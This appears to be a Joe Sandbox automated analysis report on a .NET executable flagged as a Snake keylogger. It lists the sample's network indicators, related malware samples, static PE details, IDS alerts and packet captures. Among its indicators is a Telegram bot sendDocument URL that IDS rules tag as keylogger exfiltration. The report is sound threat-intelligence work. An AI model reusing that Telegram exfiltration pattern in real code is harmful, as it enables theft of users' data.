http://checkip.dyndns.org/d	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000003.00000002.4534096761.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588302
Start date and time:	2025-01-10 23:43:36 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	z87sammylastborn.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 78 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:44:38	API Interceptor	10259335x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
149.154.167.220	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
132.226.247.73	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
api.telegram.org	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.162.153
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.223.109
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
TELEGRAMRU	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
UTMEMUS	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
3b5074b1b5d032e5620f69f9f700ff0e	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\z87sammylastborn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7267398314639495
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	z87sammylastborn.exe
File size:	205'312 bytes
MD5:	a5211c64910b02b059f301b05de54b16
SHA1:	1f1ee1f8602bdc6400bc0290b1428e9f0362d4e9
SHA256:	93b30930ca258fb9815309b89e3e5941d072832ab728a7af042f9c8d79a72d22
SHA512:	d64f1162fd5f19fb1ace20583a3e9a16956b03561f8b9e2a6a621a93a7a010eecb1a9e16521dd98ec256f2e43946aee255f2d3960e17cdb1435326bc9d086b8c
SSDEEP:	3072:uXjI4IweUBbWrT1KS2pgijHvCmeOtKkUeJEJ2WTi5Rg/N2FF:uTI6evHugijHvDeAU5J23g
TLSH:	F414E65F3AF4419EF0F4063FB7224B0212B7F8C9B3D965064D211EDA6A05697369BEB0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZA................0..............7... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43371e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x827F415A [Thu May 19 00:31:22 2039 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x336c4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x31724	0x31800	2f5592991ef704a086df04c69b22c333	False	0.6826714409722222	data	7.7536199191262964	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x34000	0x586	0x600	4713da45945b2a2056b5d5a9c5d1b92a	False	0.412109375	data	4.008929408222653	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	6f6bb9996e1bcbc53f04faf30c5d7cb1	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x340a0	0x2fc	data			0.43324607329842935
RT_MANIFEST	0x3439c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:44:32.994323+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	132.226.247.73	80	TCP
2025-01-10T23:44:39.242851+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	132.226.247.73	80	TCP
2025-01-10T23:44:39.863580+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49711	149.154.167.220	443	TCP
2025-01-10T23:44:40.124585+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49711	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:44:31.990811110 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:44:31.995915890 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:44:31.998667955 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:44:31.998888969 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:44:32.003988028 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:44:32.702743053 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:44:32.719873905 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:44:32.725043058 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:44:32.940507889 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:44:32.975780010 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:32.975828886 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:32.976274014 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:32.994323015 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:44:33.056798935 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:33.056830883 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:33.544758081 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:33.544830084 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:33.551790953 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:33.551810980 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:33.552649021 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:33.602214098 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:33.701813936 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:33.743335009 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:33.813875914 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:33.813963890 CET	443	49707	104.21.48.1	192.168.2.5
Jan 10, 2025 23:44:33.814023972 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:33.828279972 CET	49707	443	192.168.2.5	104.21.48.1
Jan 10, 2025 23:44:38.976475000 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:44:38.981358051 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:44:39.194278002 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:44:39.206268072 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:39.206326962 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:39.206398964 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:39.206872940 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:39.206891060 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:39.242851019 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:44:39.815841913 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:39.815984964 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:39.817939043 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:39.817955017 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:39.818214893 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:39.819899082 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:39.863328934 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:39.863435030 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:39.863444090 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:40.124631882 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:40.124718904 CET	443	49711	149.154.167.220	192.168.2.5
Jan 10, 2025 23:44:40.124773979 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:44:40.125183105 CET	49711	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:45:15.187652111 CET	63598	53	192.168.2.5	162.159.36.2
Jan 10, 2025 23:45:15.192477942 CET	53	63598	162.159.36.2	192.168.2.5
Jan 10, 2025 23:45:15.192542076 CET	63598	53	192.168.2.5	162.159.36.2
Jan 10, 2025 23:45:15.197288990 CET	53	63598	162.159.36.2	192.168.2.5
Jan 10, 2025 23:45:15.679245949 CET	63598	53	192.168.2.5	162.159.36.2
Jan 10, 2025 23:45:15.684307098 CET	53	63598	162.159.36.2	192.168.2.5
Jan 10, 2025 23:45:15.684365988 CET	63598	53	192.168.2.5	162.159.36.2
Jan 10, 2025 23:45:44.190171957 CET	80	49706	132.226.247.73	192.168.2.5
Jan 10, 2025 23:45:44.190387011 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:46:13.822518110 CET	49706	80	192.168.2.5	132.226.247.73
Jan 10, 2025 23:46:13.827790976 CET	80	49706	132.226.247.73	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:44:31.974431992 CET	62604	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:44:31.981518030 CET	53	62604	1.1.1.1	192.168.2.5
Jan 10, 2025 23:44:32.957355976 CET	51085	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:44:32.967778921 CET	53	51085	1.1.1.1	192.168.2.5
Jan 10, 2025 23:44:39.198900938 CET	63918	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:44:39.205583096 CET	53	63918	1.1.1.1	192.168.2.5
Jan 10, 2025 23:45:15.187117100 CET	53	62715	162.159.36.2	192.168.2.5
Jan 10, 2025 23:45:15.804749966 CET	53	52793	1.1.1.1	192.168.2.5

DNS Queries

